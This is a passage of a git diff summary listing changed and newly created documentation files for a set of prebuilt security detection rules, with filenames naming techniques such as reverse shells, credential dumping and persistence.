| 6 +- ...sessionpipe-registry-modification.asciidoc | 11 +- .../office-test-registry-persistence.asciidoc | 11 +- ...force-or-password-spraying-attack.asciidoc | 2 +- ...nsight-threat-suspected-promotion.asciidoc | 2 +- .../okta-user-session-impersonation.asciidoc | 2 +- ...uled-task-activity-via-powershell.asciidoc | 10 +- .../parent-process-pid-spoofing.asciidoc | 15 +- ...tence-via-hidden-run-key-detected.asciidoc | 20 +- ...ript-or-desktop-file-modification.asciidoc | 43 +- ...tence-via-microsoft-office-addins.asciidoc | 6 +- ...ersistence-via-powershell-profile.asciidoc | 15 +- ...ycontroller-scheduled-task-hijack.asciidoc | 23 +- ...pdate-orchestrator-service-hijack.asciidoc | 15 +- ...stence-via-wmi-event-subscription.asciidoc | 11 +- .../port-forwarding-rule-addition.asciidoc | 11 +- ...-dga-command-and-control-behavior.asciidoc | 6 +- .../possible-okta-dos-attack.asciidoc | 2 +- ...f-repeated-mfa-push-notifications.asciidoc | 2 +- ...ial-code-execution-via-postgresql.asciidoc | 2 +- ...tial-credential-access-via-dcsync.asciidoc | 15 +- ...tial-access-via-lsass-memory-dump.asciidoc | 11 +- ...ess-via-memory-dump-file-creation.asciidoc | 102 ++ ...cess-via-renamed-com-services-dll.asciidoc | 15 +- ...ess-via-trusted-developer-utility.asciidoc | 27 +- ...tial-access-via-windows-utilities.asciidoc | 15 +- ...-curl-cve-2023-38545-exploitation.asciidoc | 2 +- ...ty-to-an-unusual-destination-port.asciidoc | 58 ++ ...activity-to-an-unusual-ip-address.asciidoc | 58 ++ ...n-activity-to-an-unusual-iso-code.asciidoc | 58 ++ ...ion-activity-to-an-unusual-region.asciidoc | 58 ++ ...tential-defense-evasion-via-proot.asciidoc | 2 +- .../potential-dga-activity.asciidoc | 58 ++ .../potential-disabling-of-apparmor.asciidoc | 2 +- .../potential-disabling-of-selinux.asciidoc | 2 +- ...ng-via-trusted-microsoft-programs.asciidoc | 89 ++ ...ential-dns-tunneling-via-nslookup.asciidoc | 6 +- ...al-linux-ssh-brute-force-detected.asciidoc | 6 +- ...tential-file-transfer-via-certreq.asciidoc | 84 ++ ...-hidden-process-via-mount-hidepid.asciidoc | 2 +- ...al-linux-ssh-brute-force-detected.asciidoc | 6 +- ...teral-tool-transfer-via-smb-share.asciidoc | 7 +- ...ux-backdoor-user-account-creation.asciidoc | 3 +- ...ntial-dumping-via-proc-filesystem.asciidoc | 2 +- ...x-credential-dumping-via-unshadow.asciidoc | 2 +- ...otential-linux-hack-tool-launched.asciidoc | 73 ++ ...ocal-account-brute-force-detected.asciidoc | 2 +- ...ransomware-note-creation-detected.asciidoc | 14 +- ...-tunneling-and-or-port-forwarding.asciidoc | 30 +- ...tential-local-ntlm-relay-via-http.asciidoc | 15 +- ...l-masquerading-as-browser-process.asciidoc | 57 +- ...erading-as-business-app-installer.asciidoc | 24 +- ...asquerading-as-communication-apps.asciidoc | 23 +- ...tial-masquerading-as-system32-dll.asciidoc | 60 +- ...squerading-as-system32-executable.asciidoc | 19 +- ...potential-masquerading-as-vlc-dll.asciidoc | 19 +- ...tential-meterpreter-reverse-shell.asciidoc | 31 +- .../potential-network-scan-detected.asciidoc | 4 +- ...l-network-scan-executed-from-host.asciidoc | 60 ++ ...potential-network-share-discovery.asciidoc | 11 +- .../potential-network-sweep-detected.asciidoc | 4 +- ...-non-standard-port-ssh-connection.asciidoc | 17 +- ...openssh-backdoor-logging-activity.asciidoc | 46 +- ...rsistence-through-init-d-detected.asciidoc | 3 +- ...rough-motd-file-creation-detected.asciidoc | 9 +- ...ence-through-run-control-detected.asciidoc | 7 +- ...ce-via-time-provider-modification.asciidoc | 15 +- ...rint-processor-registration-abuse.asciidoc | 10 +- ...on-through-writable-docker-socket.asciidoc | 2 +- ...on-via-container-misconfiguration.asciidoc | 2 +- ...lege-escalation-via-cve-2023-4911.asciidoc | 24 +- ...alation-via-installerfiletakeover.asciidoc | 17 +- ...rivilege-escalation-via-overlayfs.asciidoc | 2 +- ...l-privilege-escalation-via-pkexec.asciidoc | 2 +- ...-escalation-via-python-cap-setuid.asciidoc | 71 ++ ...-via-recently-compiled-executable.asciidoc | 2 +- ...tion-via-uid-int-max-bug-detected.asciidoc | 2 +- ...ation-via-samaccountname-spoofing.asciidoc | 6 +- ...injection-from-malicious-document.asciidoc | 93 ++ ...-process-injection-via-powershell.asciidoc | 19 +- ...tocol-tunneling-via-chisel-client.asciidoc | 2 +- ...tocol-tunneling-via-chisel-server.asciidoc | 2 +- ...-protocol-tunneling-via-earthworm.asciidoc | 43 +- ...-pspy-process-monitoring-detected.asciidoc | 28 +- ...ote-code-execution-via-web-server.asciidoc | 5 +- ...remote-desktop-shadowing-activity.asciidoc | 6 +- ...remote-desktop-tunneling-detected.asciidoc | 15 +- ...remote-file-execution-via-msiexec.asciidoc | 107 +++ ...verse-shell-activity-via-terminal.asciidoc | 6 +- ...erse-shell-via-background-process.asciidoc | 2 +- .../potential-reverse-shell-via-java.asciidoc | 16 +- ...verse-shell-via-suspicious-binary.asciidoc | 2 +- ...hell-via-suspicious-child-process.asciidoc | 40 +- .../potential-reverse-shell-via-udp.asciidoc | 24 +- .../potential-reverse-shell.asciidoc | 15 +- ...file-deletion-via-sdelete-utility.asciidoc | 11 +- ...e-read-via-command-line-utilities.asciidoc | 2 +- ...l-via-wildcard-injection-detected.asciidoc | 2 +- ...ential-ssh-it-ssh-worm-downloaded.asciidoc | 78 ++ ...x-ftp-brute-force-attack-detected.asciidoc | 37 +- ...x-rdp-brute-force-attack-detected.asciidoc | 37 +- ...successful-ssh-brute-force-attack.asciidoc | 4 +- ...potential-sudo-hijacking-detected.asciidoc | 7 +- ...ege-escalation-via-cve-2019-14287.asciidoc | 2 +- ...anipulation-via-process-injection.asciidoc | 2 +- ...icious-debugfs-root-device-access.asciidoc | 2 +- .../potential-suspicious-file-edit.asciidoc | 10 +- ...l-syn-based-network-scan-detected.asciidoc | 4 +- ...s-via-wildcard-injection-detected.asciidoc | 2 +- ...-upgrade-of-non-interactive-shell.asciidoc | 69 ++ ...indows-error-manager-masquerading.asciidoc | 6 +- .../powershell-keylogging-script.asciidoc | 6 +- ...ell-script-block-logging-disabled.asciidoc | 6 +- ...ord-policy-discovery-capabilities.asciidoc | 15 +- ...-execution-capabilities-via-winrm.asciidoc | 15 +- ...wershell-share-enumeration-script.asciidoc | 12 +- ...ery-related-windows-api-functions.asciidoc | 12 +- ...t-with-audio-capture-capabilities.asciidoc | 6 +- ...ion-by-the-microsoft-build-engine.asciidoc | 11 +- ...-started-from-process-id-pid-file.asciidoc | 4 +- ...-termination-followed-by-deletion.asciidoc | 10 +- .../psexec-network-connection.asciidoc | 15 +- .../rule-details/rare-aws-error-code.asciidoc | 2 +- .../rdp-enabled-via-registry.asciidoc | 11 +- ...istry-persistence-via-appcert-dll.asciidoc | 15 +- ...istry-persistence-via-appinit-dll.asciidoc | 11 +- .../remote-execution-via-file-shares.asciidoc | 8 +- ...e-download-via-script-interpreter.asciidoc | 15 +- ...mote-xsl-script-execution-via-com.asciidoc | 84 ++ ...-task-created-by-a-windows-script.asciidoc | 19 +- ...d-task-execution-at-scale-via-gpo.asciidoc | 11 +- ...cheduled-tasks-at-command-enabled.asciidoc | 15 +- ...ity-software-discovery-using-wmic.asciidoc | 10 +- ...urity-software-discovery-via-grep.asciidoc | 13 +- .../sensitive-files-compression.asciidoc | 4 +- ...ationprivilege-assigned-to-a-user.asciidoc | 11 +- ...ol-spawned-via-script-interpreter.asciidoc | 44 +- ...tcap-setuid-setgid-capability-set.asciidoc | 68 ++ ...ged-by-previously-unknown-process.asciidoc | 5 +- ...s-disabling-services-via-registry.asciidoc | 7 +- .../spike-in-aws-error-messages.asciidoc | 2 +- ...to-an-external-device-via-airdrop.asciidoc | 58 ++ ...-bytes-sent-to-an-external-device.asciidoc | 58 ++ ...authorized-keys-file-modification.asciidoc | 4 +- ...-persistence-via-unsigned-process.asciidoc | 15 +- ...sudo-command-enumeration-detected.asciidoc | 2 +- .../sudoers-file-modification.asciidoc | 4 +- .../suid-sguid-enumeration-detected.asciidoc | 8 +- ...us-activity-reported-by-okta-user.asciidoc | 2 +- .../suspicious-cmd-execution-via-wmi.asciidoc | 10 +- ...s-communication-app-child-process.asciidoc | 19 +- ...racted-or-decompressed-via-funzip.asciidoc | 2 +- ...ta-encryption-via-openssl-utility.asciidoc | 2 +- ...rsistence-or-privilege-escalation.asciidoc | 15 +- ...-endpoint-security-parent-process.asciidoc | 6 +- ...s-execution-from-a-mounted-device.asciidoc | 7 +- .../suspicious-execution-via-msiexec.asciidoc | 94 ++ ...ious-execution-via-scheduled-task.asciidoc | 15 +- ...suspicious-explorer-child-process.asciidoc | 32 +- ...us-file-changes-activity-detected.asciidoc | 14 +- ...e-creation-in-etc-for-persistence.asciidoc | 2 +- ...-load-taskschd-dll-from-ms-office.asciidoc | 19 +- ...icious-imagepath-service-creation.asciidoc | 11 +- .../suspicious-java-child-process.asciidoc | 10 +- ...ious-managed-code-hosting-process.asciidoc | 4 +- ...ous-mining-process-creation-event.asciidoc | 2 +- .../suspicious-modprobe-file-event.asciidoc | 12 +- ...uspicious-ms-office-child-process.asciidoc | 17 +- ...spicious-ms-outlook-child-process.asciidoc | 28 +- .../suspicious-net-code-compilation.asciidoc | 17 +- ...ous-net-reflection-via-powershell.asciidoc | 7 +- ...-by-previously-unknown-executable.asciidoc | 77 +- ...spicious-pdf-reader-child-process.asciidoc | 21 +- ...able-encoded-in-powershell-script.asciidoc | 11 +- ...oc-pseudo-file-system-enumeration.asciidoc | 9 +- ...ess-access-via-direct-system-call.asciidoc | 11 +- ...ion-via-renamed-psexec-executable.asciidoc | 15 +- ...rocess-spawned-from-motd-detected.asciidoc | 31 +- ...picious-rdp-activex-client-loaded.asciidoc | 6 +- ...stry-access-via-sebackupprivilege.asciidoc | 6 +- ...suspicious-renaming-of-esxi-files.asciidoc | 2 +- ...-renaming-of-esxi-index-html-file.asciidoc | 2 +- ...uspicious-script-object-execution.asciidoc | 6 +- ...startup-shell-folder-modification.asciidoc | 11 +- .../suspicious-symbolic-link-created.asciidoc | 6 +- .../suspicious-sysctl-file-event.asciidoc | 9 +- ...-by-previously-unknown-executable.asciidoc | 2 +- ...cious-termination-of-esxi-process.asciidoc | 2 +- ...leshooting-pack-cabinet-execution.asciidoc | 74 ++ ...-utility-launched-via-proxychains.asciidoc | 2 +- ...suspicious-werfault-child-process.asciidoc | 28 +- .../suspicious-which-enumeration.asciidoc | 4 +- ...process-cluster-spawned-by-a-host.asciidoc | 59 ++ ...uster-spawned-by-a-parent-process.asciidoc | 61 ++ ...process-cluster-spawned-by-a-user.asciidoc | 61 ++ ...picious-wmic-xsl-script-execution.asciidoc | 11 +- .../suspicious-zoom-child-process.asciidoc | 11 +- ...bolic-link-to-shadow-copy-created.asciidoc | 10 +- ...-or-moved-to-suspicious-directory.asciidoc | 20 +- .../system-log-file-deletion.asciidoc | 45 +- .../system-shells-via-services.asciidoc | 19 +- .../tainted-kernel-module-load.asciidoc | 63 ++ ...mporarily-scheduled-task-creation.asciidoc | 15 +- ...es-deleted-via-unexpected-process.asciidoc | 6 +- ...nternet-explorer-add-on-installer.asciidoc | 28 +- ...eged-ifileoperation-com-interface.asciidoc | 23 +- ...ia-windows-directory-masquerading.asciidoc | 23 +- ...ademanager-elevated-com-interface.asciidoc | 28 +- ...diskcleanup-scheduled-task-hijack.asciidoc | 28 +- ...icmluautil-elevated-com-interface.asciidoc | 28 +- ...a-windows-firewall-snap-in-hijack.asciidoc | 23 +- ...zed-access-to-an-okta-application.asciidoc | 2 +- .../unix-socket-connection.asciidoc | 65 ++ ...igned-bits-service-client-process.asciidoc | 72 ++ ...d-dll-loaded-by-a-trusted-process.asciidoc | 2 +- .../unsigned-dll-loaded-by-svchost.asciidoc | 28 +- ...-loading-from-a-suspicious-folder.asciidoc | 10 +- .../untrusted-driver-loaded.asciidoc | 14 +- .../unusual-aws-command-for-a-user.asciidoc | 2 +- .../unusual-child-process-of-dns-exe.asciidoc | 16 +- .../unusual-city-for-an-aws-command.asciidoc | 2 +- ...nusual-country-for-an-aws-command.asciidoc | 2 +- ...tion-by-a-system-critical-process.asciidoc | 11 +- ...sual-file-modification-by-dns-exe.asciidoc | 16 +- ...vity-from-a-windows-system-binary.asciidoc | 18 +- ...persistence-via-services-registry.asciidoc | 11 +- .../unusual-process-extension.asciidoc | 6 +- ...rocess-for-mssql-service-accounts.asciidoc | 21 +- ...unusual-process-spawned-by-a-host.asciidoc | 61 ++ ...ocess-spawned-by-a-parent-process.asciidoc | 61 ++ ...unusual-process-spawned-by-a-user.asciidoc | 61 ++ ...riting-data-to-an-external-device.asciidoc | 58 ++ ...t-child-process-childless-service.asciidoc | 6 +- ...user-privilege-enumeration-via-id.asciidoc | 5 +- .../virtual-machine-fingerprinting.asciidoc | 2 +- ...adow-copy-deletion-via-powershell.asciidoc | 15 +- ...ume-shadow-copy-deletion-via-wmic.asciidoc | 11 +- ...ess-child-of-common-web-processes.asciidoc | 28 +- ...isabled-via-registry-modification.asciidoc | 6 +- ...-firewall-disabled-via-powershell.asciidoc | 15 +- ...taller-with-suspicious-properties.asciidoc | 79 ++ .../windows-network-enumeration.asciidoc | 11 +- ...ndows-script-executing-powershell.asciidoc | 19 +- ...rpreter-executing-process-via-wmi.asciidoc | 10 +- .../wmi-incoming-lateral-movement.asciidoc | 23 +- .../rule-details/wmic-remote-command.asciidoc | 6 +- ...access-on-active-directory-object.asciidoc | 6 +- docs/index.asciidoc | 2 + 758 files changed, 38264 insertions(+), 1644 deletions(-) create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-abnormal-process-id-or-lock-file-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-access-to-a-sensitive-ldap-attribute.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-discovery-command-via-system-account.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-password-reset-remotely.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adding-hidden-file-attribute-via-attrib.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adfind-command-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-backdoor.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-sdprop-exclusion-added.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adobe-hijack-persistence.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-iptables-or-firewall.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-syslog-service.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-base16-or-base32-encoding-decoding-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bash-shell-profile-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-binary-executed-from-shared-memory-directory.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bpf-filter-applied-using-tc.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bypass-uac-via-event-viewer.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-chkconfig-service-add.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-console-history.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-clearing-windows-event-logs.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cobalt-strike-command-and-control-beacon.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-code-signing-policy-modification-through-registry.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-execution-via-solarwinds-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-command-shell-activity-started-via-rundll32.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-component-object-model-hijacking.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-conhost-spawned-by-suspicious-parent-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-commonly-abused-web-services.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-external-network-via-telnet.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-internal-network-via-telnet.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-files-and-directories-via-commandline.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-shared-object-file.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cron-job-created-or-changed-by-previously-unknown-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deleting-backup-catalogs-with-wbadmin.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disable-windows-event-and-security-logs-using-built-in-tools.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-user-account-control-via-registry-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disabling-windows-defender-security-settings-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dns-over-https-enabled-via-registry.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-dynamic-linker-copy.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-encrypting-files-with-winrar-or-7z.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-enumeration-of-kernel-modules.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-find.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-discovery-via-grep.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-esxi-timestomping-using-touch-command.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exchange-mailbox-export-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-execution-via-tsclient-mountpoint.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-exporting-exchange-mailbox-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-deletion-via-shred.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-made-immutable-by-chattr.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-permission-modification-in-writable-directory.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-file-transfer-or-listener-established-via-netcat.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-first-time-seen-driver-loaded.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-firsttime-seen-account-performing-dcsync.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-halfbaked-command-and-control-beacon.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-high-number-of-process-terminations.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hosts-file-modified.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-hping-process-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-image-file-execution-options-injection.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-dcom-lateral-movement-with-mmc.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-incoming-execution-via-powershell-remoting.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-installation-of-security-support-provider.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-perl.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-interactive-terminal-spawned-via-python.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kerberos-pre-authentication-disabled-for-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-load-or-unload-via-kexec-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-load-via-insmod.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-removal.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lateral-movement-via-startup-folder.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-init-pid-1-secret-dump-via-gdb.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-restricted-shell-breakout-via-linux-binary-s.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-user-added-to-privileged-group.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-local-account-tokenfilter-policy-disabled.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lsass-process-access-via-windows-api.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-an-unusual-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-started-by-a-script-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-build-engine-using-an-alternate-name.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-server-um-writing-suspicious-files.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-exchange-worker-spawning-suspicious-processes.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-microsoft-windows-defender-tampering.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-amsienable-registry-key.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-dynamic-linker-preload-shared-object.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-openssh-binaries.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-standard-authentication-module-or-configuration.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-modification-of-the-mspkiaccountcredentials.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-namespace-manipulation-using-unshare.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-netcat-listener-established-via-rlwrap.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-activity-detected-via-cat.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-recently-compiled-executable.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-registration-utility.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-network-connection-via-signed-binary.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-activesyncalloweddeviceid-added-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-service-created-by-previously-unknown-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-timer-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nping-process-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ntds-or-sam-database-file-copied.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nullsessionpipe-registry-modification.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-outbound-scheduled-task-activity-via-powershell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-parent-process-pid-spoofing.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-hidden-run-key-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc create mode 100644 